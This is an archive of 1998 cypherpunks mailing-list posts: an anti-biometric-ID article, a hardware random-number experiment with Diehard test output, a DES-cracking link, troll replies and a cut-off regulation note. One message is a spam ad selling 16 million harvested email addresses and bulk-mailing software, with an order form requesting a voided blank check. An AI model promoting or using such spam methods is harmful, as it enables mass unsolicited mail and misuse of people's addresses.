system, through their civilian careers, and through their use of the medical services. Toward a womb to tomb database At the moment, these databases are provided only with an electronic portfolio for every student, an assessment of each student's work and behavior by his teacher and the student's social security number. It is proposed also to include: data about prenatal care; birth weight; number of years in a pre-school program; poverty status; physical, emotional and other development at various ages; date of last routine health and dental care; plus many other items such as the employer's name and whether the person is registered to vote. A womb to tomb, all seeing, all knowing database. In a book published jointly by the U.S. Department of Education and the U.S. Department of Health and Human Services, there is ominous talk of "overcoming the confidentiality barrier. "The purpose of the new databases being stated as giving all agencies "ready access to each other's data. " There is a group in the US known as the American Association of Motor Vehicle Administrators (AAMVA) which is actively involved with the Transportation Secretary in proposing or actually changing the various state driving licences to include digitally encoded fingerprints, retinal scans, digital computer readable photographs and other biometric forms of identification. So far, some 28 States have actually begun to make or proposed the changes to their driver's licences. Last December, the AAMVA announced that fingerprints are their currently favored form of biometric identification. It may interest readers to learn that many Canadian provinces are also members of the AAMVA. It would be naive to think that these ideas will not cross the world's longest undefended border before long. All the State assemblies which have introduced the necessary legislation to implement this new form of national ID have done so under cover, usually at the end of a legislative session in the middle of the night. These politicians know a thing or two about journalists. The mainstream media having been remarkably silent on the subject and frequently supportive of the federal government. On a positive note, at least a few States are now actively involved in trying to repeal the fingerprinting requirement. Alabama and New Jersey have done it, and Georgia is considering a piece of draft legislation which will forbid the use of biometric identifiers of any kind. "Live Free or Die "the motto of our neighboring US State of New Hampshire, may well become somewhat more than a motto if its citizens do not resist these latest proposals emanating from their Federal Government. Perhaps, instead of providing their fingerprints, they should show their politicians a collective upraised finger. 
 <index.htm> <index.htm>sommaire    page suivante  <980801-7.htm> <980801-7.htm>    








Jean-Francois Avon, B.Sc. Physics, Montreal, Canada
  DePompadour, Socit d'Importation Lte
     Limoges fine porcelain and french crystal
  JFA Technologies, R&D physicists & engineers
     Instrumentation & control, LabView programming
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 2 Aug 1998 06:00:29 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Virgin rebirth/Penis pong/Beaver boy
Message-ID: <19980801151300.10679.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/1/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 1 Aug 1998 12:21:53 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cracking DES 8
Message-ID: <199808011921.PAA06390@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Chapter 8, Hardware Board Schematics:

   http://jya.com/crack-des08.htm  (13K + 8 images)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 1 Aug 1998 07:01:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: CypherPunks Are Stupid DickWads!!!
Message-ID: <199808011401.QAA17879@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Someone (we will never know who) wrote:

NO>Cuthmarks=***

NO>  Well, I just thought I'd let you guys know how stupid you are and how
NO>you'll never know who I am, or how to find me, because I am cutting the
NO>edge off of computer technology.

NO>                          *** The Fire House Inn ***
NO>                                 Come visit us
NO>                               Telnet: fhouse.org
NO>                                WWW:  fhouse.org
NO>                                  *********** 

It looks like Toto has made fools of us again. Damn he is smart!

FoolMonger
                          *** The Fire House Inn ***
                                 Come visit us
                               Telnet: fhouse.org
                                WWW:  fhouse.org
                                  *********** 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Sat, 1 Aug 1998 16:39:39 -0700 (PDT)
To: cypherpunks@toad.com
Subject: MAKE ENTROPY CHEAP!!!
Message-ID: <3.0.5.32.19980801163906.007bc7d0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




Producing True Random Numbers at 44Kbits/sec on a common PC

I found that FM radio hiss can be digitized and processed to yield true,
quality random numbers which pass the Diehard randomness tests.

A cheap FM radio was tuned to hiss at the high end of the FM band.  
The radio's earphone-out signal was fed into ordinary computer soundcard and
digitized at 16bits/sample at 22Ksamples/sec.  

Various spectral-analysis programs showed that the FM hiss was fairly white
analog noise, however the raw data did not pass Diehard tests.

I then processed the raw data: The parity of each raw byte
was shifted into a register until a byte accumulated, which was then output.

The resulting data, 1/8 the size of the raw data, passes Diehard randomness
tests with
no additional processing.


Diehard output:
 BIRTHDAY SPACINGS TEST, M= 512 N=2**24 LAMBDA=  2.0000
           bigsimple.bin   using bits  1 to 24 p-value=  .215128
           bigsimple.bin   using bits  2 to 25 p-value=  .749499
           bigsimple.bin   using bits  3 to 26 p-value=  .096196
           bigsimple.bin   using bits  4 to 27 p-value=  .658912
           bigsimple.bin   using bits  5 to 28 p-value=  .017458
           bigsimple.bin   using bits  6 to 29 p-value=  .574795
           bigsimple.bin   using bits  7 to 30 p-value=  .057843
           bigsimple.bin   using bits  8 to 31 p-value=  .755589
           bigsimple.bin   using bits  9 to 32 p-value=  .088504
   The 9 p-values were
        .215128   .749499   .096196   .658912   .017458
        .574795   .057843   .755589   .088504
  A KSTEST for the 9 p-values yields  .896831
----------------------------------------------------------------------------
----
           OPERM5 test for file bigsimple.bin  
 chisquare for 99 degrees of freedom= 87.229; p-value= .204786
           OPERM5 test for file bigsimple.bin  
 chisquare for 99 degrees of freedom=159.365; p-value= .999882
----------------------------------------------------------------------------
----
    Binary rank test for bigsimple.bin  
         Rank test for 31x31 binary matrices:
        rows from leftmost 31 bits of each 32-bit integer
      rank   observed  expected (o-e)^2/e  sum
        28       199     211.4   .729394     .729
        29      5138    5134.0   .003101     .732
        30     23023   23103.0   .277344    1.010
        31     11640   11551.5   .677653    1.687
  chisquare= 1.687 for 3 d. of f.; p-value= .457248
    Binary rank test for bigsimple.bin  
         Rank test for 32x32 binary matrices:
        rows from leftmost 32 bits of each 32-bit integer
      rank   observed  expected (o-e)^2/e  sum
        29       206     211.4   .138848     .139
        30      5156    5134.0   .094185     .233
        31     23196   23103.0   .373989     .607
        32     11442   11551.5  1.038443    1.645
  chisquare= 1.645 for 3 d. of f.; p-value= .450664
----------------------------------------------------------------------------
----
 b-rank test for bits  1 to  8 p=1-exp(-SUM/2)= .14013
 b-rank test for bits  2 to  9 p=1-exp(-SUM/2)= .95786
 b-rank test for bits  3 to 10 p=1-exp(-SUM/2)= .23685
 b-rank test for bits  4 to 11 p=1-exp(-SUM/2)= .54937
 b-rank test for bits  5 to 12 p=1-exp(-SUM/2)= .60969
 b-rank test for bits  6 to 13 p=1-exp(-SUM/2)= .62964
 b-rank test for bits  7 to 14 p=1-exp(-SUM/2)= .89250
 b-rank test for bits  8 to 15 p=1-exp(-SUM/2)= .78444
 b-rank test for bits  9 to 16 p=1-exp(-SUM/2)= .55013
 b-rank test for bits 10 to 17 p=1-exp(-SUM/2)= .23741
 b-rank test for bits 11 to 18 p=1-exp(-SUM/2)= .03669
 b-rank test for bits 12 to 19 p=1-exp(-SUM/2)= .04415
 b-rank test for bits 13 to 20 p=1-exp(-SUM/2)= .62760
 b-rank test for bits 14 to 21 p=1-exp(-SUM/2)= .61393
 b-rank test for bits 15 to 22 p=1-exp(-SUM/2)= .96515
 b-rank test for bits 16 to 23 p=1-exp(-SUM/2)= .08958
 b-rank test for bits 17 to 24 p=1-exp(-SUM/2)= .41657
 b-rank test for bits 18 to 25 p=1-exp(-SUM/2)= .57191
 b-rank test for bits 19 to 26 p=1-exp(-SUM/2)= .88550
 b-rank test for bits 20 to 27 p=1-exp(-SUM/2)= .08824
 b-rank test for bits 21 to 28 p=1-exp(-SUM/2)= .71721
 b-rank test for bits 22 to 29 p=1-exp(-SUM/2)= .54291
 b-rank test for bits 23 to 30 p=1-exp(-SUM/2)= .67989
 b-rank test for bits 24 to 31 p=1-exp(-SUM/2)= .53742
 b-rank test for bits 25 to 32 p=1-exp(-SUM/2)= .17990
   TEST SUMMARY, 25 tests on 100,000 random 6x8 matrices
 These should be 25 uniform [0,1] random variables:
     .140129     .957865     .236846     .549372     .609694
     .629638     .892499     .784442     .550129     .237412
     .036688     .044150     .627598     .613930     .965150
     .089578     .416568     .571912     .885501     .088241
     .717215     .542912     .679889     .537418     .179904
   brank test summary for bigsimple.bin  
       The KS test for those 25 supposed UNI's yields
                    KS p-value= .206759
----------------------------------------------------------------------------
----
  No. missing words should average  141909. with sigma=428.
 tst no  1:  142384 missing words,    1.11 sigmas from mean, p-value= .86629
 tst no  2:  142777 missing words,    2.03 sigmas from mean, p-value= .97868
 tst no  3:  143026 missing words,    2.61 sigmas from mean, p-value= .99546
 tst no  4:  142308 missing words,     .93 sigmas from mean, p-value= .82420
 tst no  5:  142173 missing words,     .62 sigmas from mean, p-value= .73107
 tst no  6:  142022 missing words,     .26 sigmas from mean, p-value= .60382
 tst no  7:  141931 missing words,     .05 sigmas from mean, p-value= .52019
 tst no  8:  142314 missing words,     .95 sigmas from mean, p-value= .82780
 tst no  9:  141482 missing words,   -1.00 sigmas from mean, p-value= .15904
 tst no 10:  141443 missing words,   -1.09 sigmas from mean, p-value= .13796
 tst no 11:  141796 missing words,    -.26 sigmas from mean, p-value= .39559
 tst no 12:  142268 missing words,     .84 sigmas from mean, p-value= .79899
 tst no 13:  141365 missing words,   -1.27 sigmas from mean, p-value= .10172
 tst no 14:  142147 missing words,     .56 sigmas from mean, p-value= .71066
 tst no 15:  141423 missing words,   -1.14 sigmas from mean, p-value= .12792
 tst no 16:  142599 missing words,    1.61 sigmas from mean, p-value= .94645
 tst no 17:  142520 missing words,    1.43 sigmas from mean, p-value= .92318
 tst no 18:  141225 missing words,   -1.60 sigmas from mean, p-value= .05492
 tst no 19:  141413 missing words,   -1.16 sigmas from mean, p-value= .12310
 tst no 20:  141194 missing words,   -1.67 sigmas from mean, p-value= .04733
----------------------------------------------------------------------------
----
    OPSO for bigsimple.bin   using bits 23 to 32        141802  -.370  .3557
    OPSO for bigsimple.bin   using bits 22 to 31        141789  -.415  .3391
    OPSO for bigsimple.bin   using bits 21 to 30        141377 -1.836  .0332
    OPSO for bigsimple.bin   using bits 20 to 29        142196   .989  .8386
    OPSO for bigsimple.bin   using bits 19 to 28        142155   .847  .8015
    OPSO for bigsimple.bin   using bits 18 to 27        142171   .902  .8166
    OPSO for bigsimple.bin   using bits 17 to 26        141331 -1.994  .0231
    OPSO for bigsimple.bin   using bits 16 to 25        141565 -1.187  .1175
    OPSO for bigsimple.bin   using bits 15 to 24        141550 -1.239  .1077
    OPSO for bigsimple.bin   using bits 14 to 23        142197   .992  .8394
    OPSO for bigsimple.bin   using bits 13 to 22        141930   .071  .5284
    OPSO for bigsimple.bin   using bits 12 to 21        141593 -1.091  .1377
    OPSO for bigsimple.bin   using bits 11 to 20        141585 -1.118  .1317
    OPSO for bigsimple.bin   using bits 10 to 19        141418 -1.694  .0451
    OPSO for bigsimple.bin   using bits  9 to 18        141044 -2.984  .0014
    OPSO for bigsimple.bin   using bits  8 to 17        141908  -.005  .4982
    OPSO for bigsimple.bin   using bits  7 to 16        141648  -.901  .1838
    OPSO for bigsimple.bin   using bits  6 to 15        141884  -.087  .4652
    OPSO for bigsimple.bin   using bits  5 to 14        142362  1.561  .9407
    OPSO for bigsimple.bin   using bits  4 to 13        141924   .051  .5202
    OPSO for bigsimple.bin   using bits  3 to 12        141289 -2.139  .0162
    OPSO for bigsimple.bin   using bits  2 to 11        142145   .813  .7918
    OPSO for bigsimple.bin   using bits  1 to 10        141728  -.625  .2659
    OQSO for bigsimple.bin   using bits 28 to 32        142157   .840  .7994
    OQSO for bigsimple.bin   using bits 27 to 31        141539 -1.255  .1047
    OQSO for bigsimple.bin   using bits 26 to 30        141511 -1.350  .0885
    OQSO for bigsimple.bin   using bits 25 to 29        141902  -.025  .4901
    OQSO for bigsimple.bin   using bits 24 to 28        141674  -.798  .2125
    OQSO for bigsimple.bin   using bits 23 to 27        141837  -.245  .4032
    OQSO for bigsimple.bin   using bits 22 to 26        142276  1.243  .8931
    OQSO for bigsimple.bin   using bits 21 to 25        142511  2.040  .9793
    OQSO for bigsimple.bin   using bits 20 to 24        142223  1.063  .8562
    OQSO for bigsimple.bin   using bits 19 to 23        141683  -.767  .2215
    OQSO for bigsimple.bin   using bits 18 to 22        141936   .090  .5360
    OQSO for bigsimple.bin   using bits 17 to 21        141337 -1.940  .0262
    OQSO for bigsimple.bin   using bits 16 to 20        141959   .168  .5669
    OQSO for bigsimple.bin   using bits 15 to 19        141975   .223  .5881
    OQSO for bigsimple.bin   using bits 14 to 18        142166   .870  .8079
    OQSO for bigsimple.bin   using bits 13 to 17        141738  -.581  .2807
    OQSO for bigsimple.bin   using bits 12 to 16        141628  -.954  .1701
    OQSO for bigsimple.bin   using bits 11 to 15        141781  -.435  .3318
    OQSO for bigsimple.bin   using bits 10 to 14        142112   .687  .7540
    OQSO for bigsimple.bin   using bits  9 to 13        141920   .036  .5144
    OQSO for bigsimple.bin   using bits  8 to 12        141668  -.818  .2067
    OQSO for bigsimple.bin   using bits  7 to 11        141655  -.862  .1943
    OQSO for bigsimple.bin   using bits  6 to 10        141984   .253  .5999
    OQSO for bigsimple.bin   using bits  5 to  9        141585 -1.099  .1358
    OQSO for bigsimple.bin   using bits  4 to  8        142013   .351  .6374
    OQSO for bigsimple.bin   using bits  3 to  7        141833  -.259  .3979
    OQSO for bigsimple.bin   using bits  2 to  6        141671  -.808  .2096
    OQSO for bigsimple.bin   using bits  1 to  5        142007   .331  .6297
     DNA for bigsimple.bin   using bits 31 to 32        142254  1.017  .8454
     DNA for bigsimple.bin   using bits 30 to 31        142326  1.229  .8905
     DNA for bigsimple.bin   using bits 29 to 30        142408  1.471  .9294
     DNA for bigsimple.bin   using bits 28 to 29        142186   .816  .7928
     DNA for bigsimple.bin   using bits 27 to 28        141882  -.081  .4679
     DNA for bigsimple.bin   using bits 26 to 27        142132   .657  .7444
     DNA for bigsimple.bin   using bits 25 to 26        141958   .144  .5571
     DNA for bigsimple.bin   using bits 24 to 25        141857  -.154  .4387
     DNA for bigsimple.bin   using bits 23 to 24        141521 -1.146  .1260
     DNA for bigsimple.bin   using bits 22 to 23        142664  2.226  .9870
     DNA for bigsimple.bin   using bits 21 to 22        141448 -1.361  .0868
     DNA for bigsimple.bin   using bits 20 to 21        142090   .533  .7030
     DNA for bigsimple.bin   using bits 19 to 20        141867  -.125  .4503
     DNA for bigsimple.bin   using bits 18 to 19        141894  -.045  .4820
     DNA for bigsimple.bin   using bits 17 to 18        141463 -1.317  .0940
     DNA for bigsimple.bin   using bits 16 to 17        141587  -.951  .1708
     DNA for bigsimple.bin   using bits 15 to 16        142088   .527  .7009
     DNA for bigsimple.bin   using bits 14 to 15        141372 -1.585  .0565
     DNA for bigsimple.bin   using bits 13 to 14        141896  -.039  .4843
     DNA for bigsimple.bin   using bits 12 to 13        142256  1.023  .8468
     DNA for bigsimple.bin   using bits 11 to 12        141172 -2.175  .0148
     DNA for bigsimple.bin   using bits 10 to 11        141524 -1.137  .1278
     DNA for bigsimple.bin   using bits  9 to 10        141700  -.617  .2685
     DNA for bigsimple.bin   using bits  8 to  9        142180   .798  .7877
     DNA for bigsimple.bin   using bits  7 to  8        141782  -.376  .3536
     DNA for bigsimple.bin   using bits  6 to  7        142054   .427  .6652
     DNA for bigsimple.bin   using bits  5 to  6        142370  1.359  .9129
     DNA for bigsimple.bin   using bits  4 to  5        142032   .362  .6413
     DNA for bigsimple.bin   using bits  3 to  4        141471 -1.293  .0980
     DNA for bigsimple.bin   using bits  2 to  3        142013   .306  .6201
     DNA for bigsimple.bin   using bits  1 to  2        141754  -.458  .3234
----------------------------------------------------------------------------
----
   Test results for bigsimple.bin  
 Chi-square with 5^5-5^4=2500 d.of f. for sample size:2560000
                               chisquare  equiv normal  p-value
  Results fo COUNT-THE-1's in successive bytes:
 byte stream for bigsimple.bin    2480.79      -.272      .392963
 byte stream for bigsimple.bin    2544.61       .631      .735960
----------------------------------------------------------------------------
----
 Chi-square with 5^5-5^4=2500 d.of f. for sample size: 256000
                      chisquare  equiv normal  p value
  Results for COUNT-THE-1's in specified bytes:
           bits  1 to  8  2539.84       .563      .713407
           bits  2 to  9  2462.74      -.527      .299128
           bits  3 to 10  2475.45      -.347      .364216
           bits  4 to 11  2352.58     -2.085      .018545
           bits  5 to 12  2486.65      -.189      .425128
           bits  6 to 13  2473.02      -.382      .351384
           bits  7 to 14  2655.21      2.195      .985918
           bits  8 to 15  2536.20       .512      .695677
           bits  9 to 16  2532.48       .459      .677002
           bits 10 to 17  2314.27     -2.627      .004311
           bits 11 to 18  2605.76      1.496      .932629
           bits 12 to 19  2588.76      1.255      .895302
           bits 13 to 20  2486.16      -.196      .422396
           bits 14 to 21  2496.38      -.051      .479582
           bits 15 to 22  2425.24     -1.057      .145196
           bits 16 to 23  2490.05      -.141      .444052
           bits 17 to 24  2373.30     -1.792      .036578
           bits 18 to 25  2356.86     -2.024      .021470
           bits 19 to 26  2557.84       .818      .793310
           bits 20 to 27  2590.32      1.277      .899259
           bits 21 to 28  2467.57      -.459      .323273
           bits 22 to 29  2496.07      -.056      .477834
           bits 23 to 30  2530.74       .435      .668114
           bits 24 to 31  2474.58      -.360      .359599
           bits 25 to 32  2580.29      1.135      .871906
----------------------------------------------------------------------------
----
           CDPARK: result of ten tests on file bigsimple.bin  
            Of 12,000 tries, the average no. of successes
                 should be 3523 with sigma=21.9
            Successes: 3529    z-score:   .274 p-value: .607947
            Successes: 3521    z-score:  -.091 p-value: .463618
            Successes: 3526    z-score:   .137 p-value: .554479
            Successes: 3536    z-score:   .594 p-value: .723613
            Successes: 3517    z-score:  -.274 p-value: .392053
            Successes: 3539    z-score:   .731 p-value: .767486
            Successes: 3524    z-score:   .046 p-value: .518210
            Successes: 3513    z-score:  -.457 p-value: .323972
            Successes: 3541    z-score:   .822 p-value: .794438
            Successes: 3527    z-score:   .183 p-value: .572463
 
           square size   avg. no.  parked   sample sigma
             100.            3527.300        8.736
            KSTEST for the above 10: p=  .804330
----------------------------------------------------------------------------
----
               This is the MINIMUM DISTANCE test
              for random integers in the file bigsimple.bin  
     Sample no.    d^2     avg     equiv uni            
           5     .1930   1.0055     .176285
          10     .5596    .9379     .430160
          15    1.1844   1.0280     .695890
          20     .5422    .8555     .420105
          25     .9861    .9044     .628811
          30     .2861    .8935     .249863
          35     .1485    .9897     .138682
          40     .2950    .9306     .256592
          45     .6921    .8989     .501193
          50     .1139    .9307     .108141
          55    1.0898    .9325     .665562
          60     .0072    .9084     .007231
          65     .6066    .8989     .456462
          70     .7895    .9008     .547730
          75     .3097    .8698     .267450
          80     .4391    .8918     .356821
          85     .8823    .8699     .588018
          90     .2776    .9121     .243421
          95    1.3020    .9192     .729777
         100    2.3327    .9325     .904094
     MINIMUM DISTANCE TEST for bigsimple.bin  
          Result of KS test on 20 transformed mindist^2's:
                                  p-value= .157745
----------------------------------------------------------------------------
----
               The 3DSPHERES test for file bigsimple.bin  
 sample no:  1     r^3=  61.647     p-value= .87189
 sample no:  2     r^3=  61.307     p-value= .87043
 sample no:  3     r^3=  21.447     p-value= .51076
 sample no:  4     r^3=   2.684     p-value= .08559
 sample no:  5     r^3=   1.207     p-value= .03942
 sample no:  6     r^3=  12.684     p-value= .34479
 sample no:  7     r^3=  24.098     p-value= .55214
 sample no:  8     r^3=    .287     p-value= .00951
 sample no:  9     r^3=  68.533     p-value= .89817
 sample no: 10     r^3=  15.201     p-value= .39751
 sample no: 11     r^3=  37.780     p-value= .71616
 sample no: 12     r^3=  48.397     p-value= .80076
 sample no: 13     r^3=  26.584     p-value= .58775
 sample no: 14     r^3=  29.700     p-value= .62842
 sample no: 15     r^3=   8.969     p-value= .25841
 sample no: 16     r^3=  43.698     p-value= .76697
 sample no: 17     r^3=  61.285     p-value= .87034
 sample no: 18     r^3=  30.428     p-value= .63733
 sample no: 19     r^3=  54.608     p-value= .83802
 sample no: 20     r^3=  19.998     p-value= .48655
       3DSPHERES test for file bigsimple.bin        p-value= .595668
----------------------------------------------------------------------------
----
            RESULTS OF SQUEEZE TEST FOR bigsimple.bin  
         Table of standardized frequency counts
     ( (obs-exp)/sqrt(exp) )^2
        for j taking values <=6,7,8,...,47,>=48:
     2.0      .1     1.3     1.6      .8    -1.0
      .0     -.1    -2.2    -1.0    -1.9      .7
      .5     -.3      .9     -.4      .6    -1.3
      .5     -.8      .4     -.2     1.6     -.5
      .5     1.6     -.1      .0    -1.1     1.2
      .8      .6      .2    -1.0     -.1     2.2
      .3     1.1      .5    -1.8     -.6      .0
    -1.1
           Chi-square with 42 degrees of freedom: 45.808
              z-score=   .415  p-value= .683048
______________________________________________________________
----------------------------------------------------------------------------
----
                Test no.  1      p-value  .130689
                Test no.  2      p-value  .697905
                Test no.  3      p-value  .312460
                Test no.  4      p-value  .031315
                Test no.  5      p-value  .961343
                Test no.  6      p-value  .483192
                Test no.  7      p-value  .554386
                Test no.  8      p-value  .960960
                Test no.  9      p-value  .767135
                Test no. 10      p-value  .146497
   Results of the OSUM test for bigsimple.bin  
        KSTEST on the above 10 p-values:  .135933
----------------------------------------------------------------------------
----
           The RUNS test for file bigsimple.bin  
     Up and down runs in a sample of 10000
_________________________________________________ 
                 Run test for bigsimple.bin  :
       runs up; ks test for 10 p's: .368663
     runs down; ks test for 10 p's: .177188
                 Run test for bigsimple.bin  :
       runs up; ks test for 10 p's: .199189
     runs down; ks test for 10 p's: .860525
----------------------------------------------------------------------------
----
                Results of craps test for bigsimple.bin  
  No. of wins:  Observed Expected
                                98315    98585.86
 Chisq=  26.08 for 20 degrees of freedom, p=  .83666
               Throws Observed Expected  Chisq     Sum
            SUMMARY  FOR bigsimple.bin  
                p-value for no. of wins: .112863
                p-value for throws/game: .836658
  Test completed.  File bigsimple.bin  
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::







honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: clarissa0p@hk.super.net
Date: Sat, 1 Aug 1998 17:32:13 -0700 (PDT)
To: michele0tl@yahoo.com
Subject: Do you market on the Net?
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Dear Internet Marketer,

Are you tired of endlessly posting your ad to online classified sites that
just don't get the job done? The fact is there are over 300 such sites
scattered about the Web and frankly none of them generate enough traffic
to be worth your while. Even when someone does visit one of these sites,
your ad is hopelessly lost in a myriad of similar offerings.

The true professionals of online marketing have known for some time that
nothing creates results the way a direct bulk email campaign does. We have
assembled a complete package on one CD-ROM that will enable to get your
message out to millions for surprisingly little cost and effort.

INTRODUCING...MILLIONS VOL. 1

We took a total of over 92 million email addresses from many of the 
touted CD's that are out there (bought them all - some were $300+)!  We
added the millions we had in storage to those.   When we combined them
all, we had in  excess of 100+ million addresses in one huge file. 

We then ran a super "sort/de-dupe" program against this huge list. 
It cut the file down to less than 25 million!!! Can you believe that? It
seems that most people that are selling CD's are duping the public by
putting numerous files of addresses in the CD over and over. This created
many duplicate addresses. They also had many program
 "generated" email addresses like Compuserve, MCI, ANON's, etc. 
This causes a tremendous amount of undeliverables, and for  those 
that use Stealth programs, clogs up servers quickly with trash, etc. 

We then ran a program that contained 150+ keywords to remove 
addresses with vulgarity,  profanity, sex-related names, postmaster,
 webmaster, flamer, abuse, spam, etc., etc.   Also eliminated all .edu,
mil, .org, .gov, etc.   After that list was run against the remaining
list, it  reduced it down to near 16 million addresses! 

So, you see, our list will save people hundreds of dollars buying all
others that are out there on  CD and otherwise. Using ours will be like
using the 100+ million that we started with, but a lot less money and a
lot less time!!  

Besides the 16 Million general email address we include over 400,000
TARGETED addresses of Business Opportunity Seekers, MLM'ers and
other Internet Marketers. These are people EAGER to hear about your
products and services. 
Other services charge upwards of 5 cents per address for this type of
list. We include it at no extra extra charge when you purchase Millions
Vol. 1

We also included a 5+ million "Remove/Flamer" file broken into seperate
files for ease of  extracting and adding to your own database of removes. 

To help you manage your email lists, you'll find a fully functional
evaluation copy of BulkMate 4.05 on your CD. BulkMate is an indispensible
tool for the serious bulk mailer. Among its 10 utilites are the ability to
filter any address list against a remove list, sort any list
alphabetically and automatically remove dupes, remove specific domains
from any list and count the number of addresses in each list.


 "You can buy from the REST or you can buy from the BEST.   Your choice.
_____________________________

What our clients are saying:

"I received the CD on Friday evening.   Like a kid with a new toy, I
immediately started bulking out using the new email addresses.  Over the
course of the weekend, I emailed out over 500,000 emails and I received
less than TWENTY undeliverables!!  I am totally satisfied with my
purchase!!  Thanks Syrynx!!"

Dave Buckley
Houston,  TX


"This list is worth it's weight in gold!!  I sent out 10,000 emails for my
product and received 185 orders!  

Ann Colby
New Orleans, LA


"I am absolutely delighted! Your support is first rate. When I needed help
you were there for me. I got a real person on the phone. I've been
marketing my product now for two weeks and can't believe how many orders
I've received. I can't thank you enough!

Gail Swanton
Boston, MA


****************************************

                  HERE'S THE BOTTOM LINE

Here is what you get when you order today!

>> 16 Million Email Addresses... 1 per line in simple text format on a CD.
Files are in lots of 100,000 (no codes needed to open files). 
All files are separated by domain name for your convenience.

PLUS you receive a tremendous REMOVE list!

AND

Over 400,000 Targeted email addresses.

AND

The sampling of CyberPromo's HOT list.

AND

BulkMate 4.05 The ultimate mail management tool.

>>> NOW ONLY $149.00!   

All lists are completely free of any Duplicates. We also on a continual
basis, add New Names and Remove Undeliverables and Remove Requests.   

The result is the Cleanest Email Addresses Available Anywhere 
to use over and over again, for a FRACTION of the cost that other 
companies charge. Typical rates for acquiring email lists are from 
1 cent to as high as 3 cents per email address - that's
"INFORMATION HIGHWAY" ROBBERY!.

Don't even hesitate on this one or you will miss out on the most 
effective way to market anywhere..PERIOD!

>>>As a special bonus we've included the entire suite of Earthonline
>>>bulk email and marketing software demos on the CD. Including
>>>the latest version of the DirectMail mailer. Use it free for 10 days !!
>>>You'll also get our  private Website address where you can check
>>> for product upgrades and other valuable marketing information.


To order our email package, simply print out the EZ ORDER FORM 
below and fax or mail it to our office today.

We accept Checks by Fax and Mail and C.O.D.

_________________
EZ Order Form 


_____Yes! I would like to order MILLIONS Vol. 1 email addresses 
for only $149.00.

All orders are sent by US Priority Mail and we pay the shipping costs!

ORDERING OPTIONS

*Mail (USPS)
   *Include a check or money order for the correct amount.
   *Make the check payable to:  Syrynx, Inc.
   *Include your phone number and/or email address in case we need to
   contact you. *Mail to:

       Syrynx, Inc.
       500 Lake Avenue
       Suite 154 
       Lake Worth, Florida  33460

*C.O.D.
   *Fill out the order form completely and write/type COD on the form.
   *Mail the form to the above address or fax to 305-418-7590 *Please have
   a certified/cashiers check or money order in the amount
    of $165.00 payable to Syrynx, Inc ready when the order arrives.
    The additonal $16.00 covers overnight shipping and C.O.D. fees.

*Fax
   *This is the preferred payment method at Syrynx, Inc.
   *ALL FUNDS ARE TO BE IN USA CURRENCY.
   *Your order can be received 24 hours a day, 7 days a week.
   *Print out and complete the following form.
   *To this form, attach a BLANK CHECK with "VOID" written
    somewhere on the body of the check.
   *This gives us the necessary account information to process your order.
   *Please note that Syrynx, Inc. charges a $40.00 fee for ALL BAD CHECKS.
   



Thank you for your order.

Syrynx, Inc.


          **********  MILLIONS VOL.1 ORDER FORM **********

*You must complete the entire form or your order can not be processed.
*You will need to tape the blank check in the space indicated below. *Fill
out and sign the authorization section below.

*Fax the ENTIRE FORM to (305) 418-7590.


*Please, print the following information.


First Name: _______________________________________________________

Last Name: _______________________________________________________

Street Address: ___________________________________________________

_________________________________________________________________

City: ____________________________________________________________

State: _____________________            Zip: _________________________

Phone Number:  __________________________________________________

EMail Address: ___________________________________________________



           * * * * * * * * * *  Authorization  * * * * * * * * * *
                        (leave blank for C.O.D. orders) 

I, ________________________________________________, hereby authorize
Syrynx, Inc. to withdraw $________________________ from my checking
account, account information enclosed, one time only, for the purchase of
the Millions Vol. 1 CD-ROM. I have read and I understand the terms and
conditions as stated above.  The signature below is the authorized
signature of the holder of the checking account.  I understand that
Syrynx, Inc. charges $40.00 for bad checks.  I understand that if the
funds are not available in my account, I agree to pay the amount of this
order plus the $40.00 fee. (Cash or Certified Funds Only).  Authorized
Signature _______________________________________________

Date: __________________ 

order code:mvi

*Attach voided, blank check below. (do not attach check for C.O.D. orders)















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Sat, 1 Aug 1998 11:55:16 -0700 (PDT)
To: cypherpunks@toad.com
Subject: CRTC asks if it should regulate the internet
Message-ID: <199808011855.UAA12259@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Date: Sat, 1 Aug 1998 10:37:34 -0400 (EDT)
From: Jeffrey Shallit
To: efc-talk@efc.ca
Subject: CRTC asks if it should regulate the internet
X-EFC-Web-Site: http://www.efc.ca


The front page of today's Globe & Mail has a story about the CRTC
asking if it should regulate the Internet.

The front page story directs you to page A4 for the remainder, which
is actually on page A3.

On page A3 an incorrect URL for the CRTC releases.  The correct ones
are:

